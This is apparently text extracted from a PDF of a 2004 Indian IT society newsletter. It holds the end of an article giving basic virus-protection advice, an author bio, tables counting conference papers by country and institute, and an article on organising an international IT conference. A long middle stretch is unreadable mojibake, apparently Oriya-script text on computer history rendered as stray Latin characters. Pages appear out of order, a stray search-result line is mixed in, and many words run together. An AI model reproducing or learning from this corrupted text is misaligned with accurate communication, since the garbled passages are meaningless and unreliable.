macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 27: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

